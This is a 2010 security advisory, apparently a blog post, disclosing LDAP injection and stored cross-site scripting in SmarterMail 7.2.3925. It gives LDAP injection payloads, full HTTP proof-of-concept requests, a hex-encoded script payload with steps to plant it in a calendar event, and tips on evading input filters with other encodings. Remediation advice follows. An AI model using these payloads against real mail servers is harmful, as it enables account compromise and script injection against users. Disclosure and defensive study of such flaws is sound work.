######################################################################## # Vendor: smartertools.com SmarterMail 7.x (7.2.3925) # Date: 2010-10-01 # Author : David Hoyt (sqlhacker) – Hoyt LLC # Contact : h02332@gmail.com # Home : http://cloudscan.me # Dork : insite: SmarterMail Enterprise 7.2 # Bug : LDAP Injection + Cross Site Scripting (STORED) # Tested on : SmarterMail 7.x (7.2.3925) // Windows 2008 /64/R2 # Uncoordinated Disclosure ######################################################################## ABSTRACT -------------------------- It is important for application developers to penetration test their products prior to release in order to find potential vulnerabilities and correct them before fraudsters exploit them. DISCLOSURE PURPOSE -------------------------- Applications for wide-scale deployment must be delivered with an exploit surface that is manageable. Developers failing to properly screen applications prior to release are at risk of uncoordinated disclosure. SECURITY COMMENTS -------------------------- Server Application developers should explicitly be detailing the exploit surface modeling performed on an application as part of the software development lifecycle prior to and as part of a candidate release. System Admins need to take a trust-no-one approach when installing Server and Client Applications for wide-scale deployment. ENGAGEMENT TOOLS -------------------------- I am using Immunity Debugger, Burp Suite Pro 1.3.08, Netsparker, Metasploit, NeXpose, XSS_Rays, FuzzDB as a baseline set of engagement tools that are being used to perform this analysis. This is manual testing. DISCUSSION AND ANALYSIS -------------------------- SmarterMail 7.x (7.2.3925) was released on 10/1/2010 and was to have addressed a number of issues identified in CVE's http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3425 and http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3486 There were a number of Private Advisories provided to Hoyt LLC Clients that were not disclosed to the public. It was our assumption that the level of detail and specificity would have resulted in a thourough scrubbing of any patches and release candidates. There are additional exploits to disclose that use a manual, multi-step process to confirm with picture proof. This advisory addresses LDAP Injection, Cross Site Scripting (STORED) and OS Injection vulnerabilities found in SmarterMail 7.x (7.2.3925). Additional advisories will be released as we develop a bullet proof audit trail. Further advisories will focus on security by obscurity in SmarterMail. My prior work focused on the URL/Parameter Combos that would deliver a Cross Site Scripting (STORED) exploit. My review seeks to focus on the identified URL/Param combos in SmarterMail 7.1 that were found to be vulnerable but not disclosed to the public and only available in private advisories to our clients and partners. AUDIT TRAIL + EXPLOIT PATTERN EXAMPLES EXPLOIT #1 -------------------------- LDAP injection and resulting STORED Cross Site Scripting in Events Planner - SmarterMail 7.x (7.2.3925) Summary Severity: High Confidence: Certain Host: http://vulnerable.smartermail.site:9998 Path: /Main/frmEmptyPreviewOuter.aspx Multiple Related URL/Parameters (available in private advisory) Issue detail The type parameter is vulnerable to LDAP injection attacks. The payloads 5faa0382d747b754)(sn=* and 5faa0382d747b754)!(sn=* were each submitted in the type parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner. Issue Background ----------------------- LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action. Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. The author has manually reviewed the reported requests and responses and confirmed a vulnerability is present. All the work presented is manual recon and analysis using the tools listed. Step by Step Process --------------------------------------------------- The steps to create the exploit as as follows: -Obtain an end-user SmarterMail 7.x (7.2.3925) -Login to WebMail, Click Events Note - The XSS attack payload can be delivered by creating an Event Group or an Event Name. My example will create a new event. I know that SmarterMail does some data sanitization, so I need to test various encoding schemes to get around the limited sanity checking. To make this easy to follow along, use URL http://ha.ckers.org/xss.html for our encoding calculator so the average Joe can leverage this exploit example. I want to make a simple test to confirm if the URL/Parameters are vulnerable in the Event Planner of SmarterMail 7.x (7.2.3925). I'll use a known malicious payload example. Using the encoding calculator, I input <\\\/script>alert(0x000170)<\\/script> and for the HEX Value Stored Cross Site Scripting exploit I want to create. The result is %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%30%78%30%30%30%31%37%30%29%3C%2F%73%63%72%69%70%74%3E, there is your example exploit for Stored XSS. Take the result and paste it into the new event name (exploit) you want to create and e-mail around to all your colleages and friends and blog about... Click submit and refresh the screen, here is what I "received" for a payload. I provide 2 examples of URL/Parameter manipulation that result in an event being created. ** Author Note.. the Blogger parser isn't very good about making me escape the nasty XSS below.. so I have to edit the post so readers don't get XSS'd.. Pictures are a part of the exploit surface model, I also like to post conclusive, picture proof of an exploit. The picture(s) below provide conclusive evidence of Cross Site Scripting (STORED) delivered via LDAP Injection. Stored Cross Site Scripting Audit Trail Picture #1 for SmarterMail 7.x (7.2.3925) LDAP Injection to leverage an XSS attack utilizing the event planner features of SmarterMail 7.x (7.2.3925) Stored Cross Site Scripting Audit Trail Picture #2 for SmarterMail 7.x (7.2.3925) LDAP Injection to leverage an XSS attack utilizing the event planner features of SmarterMail 7.x (7.2.3925) The implication here is that SmarterMail isn't defending against HEX Value malicious payloads. This is a "critical" exploit finding confirmed in SmarterMail 7.x (7.2.3925). You can keep testing with Decimal or Base 64 and produce results equal to and likely greater than what I am showing here in public, emphasis on greater than what I am showing. Issue Remediation ------------------- If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace. EXPLOIT Proof of Concept {PoC} - DETAILS -------------------------------------------- Request 1 GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)(sn=* HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Referer: http://vulnerable.smartermail.site:9998/Default.aspx Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: vulnerable.smartermail.site:9998 Proxy-Connection: Keep-Alive Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"} Response 1 HTTP/2.0 200 OK Server: SmarterTools/2.0.3925.24451 Date: Fri, 01 Oct 2010 22:28:00 GMT X-AspNet-Version: 2.0.50727 X-Compressed-By: HttpCompress Cache-Control: private Content-Type: text/html; charset=utf-8 Connection: Close Content-Length: 5204 ...[SNIP]... Request 2 GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)!(sn=* HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Referer: http://vulnerable.smartermail.site:9998/Default.aspx Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: vulnerable.smartermail.site:9998 Proxy-Connection: Keep-Alive Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"} Response 2 HTTP/2.0 200 OK Server: SmarterTools/2.0.3925.24451 Date: Fri, 01 Oct 2010 22:28:00 GMT X-AspNet-Version: 2.0.50727 X-Compressed-By: HttpCompress Cache-Control: private Content-Type: text/html; charset=utf-8 Connection: Close Content-Length: 5247 ...[SNIP]... EXPLOIT #2 -------------------------- Directory Creation by Fuzzing that results in a STORED Cross Site Scripting attack. This portion of the research focused on creating direcories that would evade the current filtering techniques used my SmarterMail to prevent OS Injection WORKAROUNDS -------------------------- Specifically, URL filtering should be employed against the malicious query strings. REMEDIATION SOLUTION ------------------------ I'm pushing a quick update to my clients now on this LDAP Injection / Stored XSS issue.. Our group is studying a remediation solution or additional workarounds that will be posted at this URL. Calender and Event functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include: Validating Input and a blacklist of strings to hinder this style of attack. There is more to the story.. since I'm just screening applications for clients, I am pushing out the info as I confirm it manually.